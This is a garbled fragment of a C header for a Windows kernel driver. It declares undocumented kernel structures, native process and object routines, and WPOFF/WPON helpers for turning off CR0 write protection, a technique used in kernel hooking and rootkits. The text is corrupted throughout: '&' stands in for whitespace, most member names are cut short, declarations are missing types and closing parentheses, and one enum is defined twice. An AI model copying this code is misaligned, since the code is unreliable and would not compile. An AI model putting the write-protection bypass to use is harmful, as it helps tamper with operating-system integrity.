&ULONG&&&&InheritedFromProcessId;
&ULONG&&&&HandleC
&ULONG&&&&Reserved2[2];
&VM_COUNTERS&&&VmC
&IO_COUNTERS&&&IoC //windows 2000 only
&struct _SYSTEM_THREADS&Threads[1];
typedef struct _HANDLE_TABLE_ENTRY_INFO
&&& ULONG AuditM
} HANDLE_TABLE_ENTRY_INFO, *PHANDLE_TABLE_ENTRY_INFO;
typedef struct _HANDLE_TABLE_ENTRY
&&&&&&& PVOID O
&&&&&&& ULONG_PTR ObA
&&&&&&& PHANDLE_TABLE_ENTRY_INFO InfoT
&&&&&&& ULONG_PTR V
&&&&&&& ULONG GrantedA
&&&&&&& struct
&&&&&&&&&&& USHORT GrantedAccessI
&&&&&&&&&&& USHORT CreatorBackTraceI
&&&&&&& };
&&&&&&& LONG NextFreeTableE
} HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY;
typedef struct _HANDLE_TABLE
&&& ULONG TableC
&&& PEPROCESS QuotaP
&&& PVOID UniqueProcessId;
&&& ULONG HandleTableLock[4];
&&& LIST_ENTRY HandleTableL
&&& ULONG HandleContentionE
&&& PVOID DebugI
&&& LONG ExtraInfoP
&&& ULONG FirstF
&&& ULONG LastF
&&& ULONG NextHandleNeedingP
&&& LONG HandleC
&&&&&&& ULONG F
&&&&&&& UCHAR StrictFIFO:1;
} HANDLE_TABLE, *PHANDLE_TABLE;
// Object-manager type and directory layouts as copied on this page (member
// names truncated). Not referenced by the visible driver code.
typedef struct _OBJECT_TYPE_INITIALIZER {
&BOOLEAN UseDefaultO
&BOOLEAN CaseI
&ULONG InvalidA
&GENERIC_MAPPING GenericM
&ULONG ValidAccessM
&BOOLEAN SecurityR
&BOOLEAN MaintainHandleC
&BOOLEAN MaintainTypeL
&POOL_TYPE PoolT
&ULONG DefaultPagedPoolC
&ULONG DefaultNonPagedPoolC
&PVOID DumpP
&PVOID OpenP
&PVOID CloseP
&PVOID DeleteP
&PVOID ParseP
&PVOID SecurityP
&PVOID QueryNameP
&PVOID OkayToCloseP
} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;
typedef struct _OBJECT_TYPE {
&ERESOURCE M
&LIST_ENTRY TypeL
&UNICODE_STRING N&&&&&&&&&&& // Copy from object header for convenience
&PVOID DefaultO
&ULONG TotalNumberOfO
&ULONG TotalNumberOfH
&ULONG HighWaterNumberOfO
&ULONG HighWaterNumberOfH
&OBJECT_TYPE_INITIALIZER TypeI
&ERESOURCE ObjectLocks[4];
} OBJECT_TYPE, *POBJECT_TYPE;
typedef struct _OBJECT_DIRECTORY {
&&& struct _OBJECT_DIRECTORY_ENTRY *HashBuckets[ 37 ];
&&& ULONG L
&&& PVOID DeviceM
&&& ULONG SessionId;
&USHORT SymbolicLinkUsageC
} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;
// KAPC_ENVIRONMENT is typedef'd twice here with different enumerator lists
// (the second form lacks InsertApcEnvironment); as written this is a
// redefinition of the same typedef name. Neither is used by the visible
// driver code. The wsprintf prototype below is likewise unused.
typedef enum _KAPC_ENVIRONMENT {
& OriginalApcEnvironment,
& AttachedApcEnvironment,
& CurrentApcEnvironment,
& InsertApcEnvironment
} KAPC_ENVIRONMENT;
typedef enum
&&& OriginalApcEnvironment,
&AttachedApcEnvironment,
&CurrentApcEnvironment
} KAPC_ENVIRONMENT;
//int swprintf( wchar_t *, const wchar_t *, ... );
int wsprintf( PWSTR buffer, PCWSTR spec, ... );
//----------------------------------------------------
// Prototypes for undocumented / non-header native routines. Return types,
// NTSYSAPI decorations and closing parentheses are lost for most entries in
// this copy. Of these, only ZwQuerySystemInformation (GetModlueBaseAdress)
// plus WPOFF/WPON are called from the visible driver code.
NTAPI ZwQuerySystemInformation(
&&&&&&&&& IN ULONG SystemInformationClass,
&&&&&&&&& IN PVOID SystemInformation,
&&&&&&&&& IN ULONG SystemInformationLength,
&&&&&&&&& OUT PULONG ReturnLength);
& NtOpenFile(
&&& OUT PHANDLE& FileHandle,
&&& IN ACCESS_MASK& DesiredAccess,
&&& IN POBJECT_ATTRIBUTES& ObjectAttributes,
&&& OUT PIO_STATUS_BLOCK& IoStatusBlock,
&&& IN ULONG& ShareAccess,
&&& IN ULONG& OpenOptions
ZwOpenProcess(
&& OUT PHANDLE ProcessHandle,
&& IN ACCESS_MASK DesiredAccess,
&& IN POBJECT_ATTRIBUTES ObjectAttributes,
&& IN PCLIENT_ID ClientId
PsLookupProcessByProcessId(
&&& IN HANDLE ProcessId,
&&& OUT PEPROCESS *Process
& PsGetProcessId(
&&& IN PEPROCESS& Process
RtlFormatCurrentUserKeyPath(
&&& OUT PUNICODE_STRING CurrentUserKeyPath
VOID KeAttachProcess( PEPROCESS proc );
VOID KeDetachProcess();
ObReferenceObjectByName(
&&&&&&IN PUNICODE_STRING ObjectName,
&&&&&&IN ULONG Attributes,
&&&&&&IN PACCESS_STATE PassedAccessState OPTIONAL,
&&&&&&IN ACCESS_MASK DesiredAccess OPTIONAL,
&&&&&&IN POBJECT_TYPE ObjectType,
&&&&&&IN KPROCESSOR_MODE AccessMode,
&&&&&&IN OUT PVOID ParseContext OPTIONAL,
&&&&&&OUT PVOID *Object
//////////////////////////////////////////////////////////////////////////
// write protection off / on (CR0.WP helpers defined in the driver source)
void WPOFF();
void WPON();